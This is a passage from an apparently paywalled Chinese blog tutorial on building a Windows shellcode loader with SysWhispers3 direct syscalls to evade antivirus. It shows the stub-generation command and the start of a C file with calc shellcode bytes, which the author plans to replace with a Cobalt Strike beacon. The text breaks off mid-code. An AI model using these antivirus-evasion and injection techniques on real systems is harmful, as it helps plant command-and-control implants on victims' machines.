首先使用github提供的项目https://github.com/klezVirus/SysWhispers3
利用该工具去执行命令
python3 syswhispers.py --functions NtCreateThreadEx,NtProtectVirtualMemory,NtAllocateVirtualMemory -o syscalls_mem --arch x64 --wow64
然后会产生三个文件

然后我们将它放到vs studio中,如下:

我们分开来看
ConsoleApplication3.c:(该payload是弹出计算器,还需要后续去改成上线cs)
#define _CRT_SECURE_NO_WARNINGS 1
#include "syscalls_mem.h"
#include <Windows.h>
#include<stdio.h>
unsigned char calc_payload[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"</
利用SysWhispers3进行Windows系统调用:动态payload与杀毒检测

文章介绍了如何使用SysWhispers3库在Windows系统中执行NtCreateThreadEx和NtProtectVirtualMemory等函数,创建一个弹出计算器的payload。然而,由于syscall的静态特征容易被杀毒软件如360识别,导致payload被标记为病毒。
最低0.47元/天 解锁文章
1122

被折叠的 条评论
为什么被折叠?



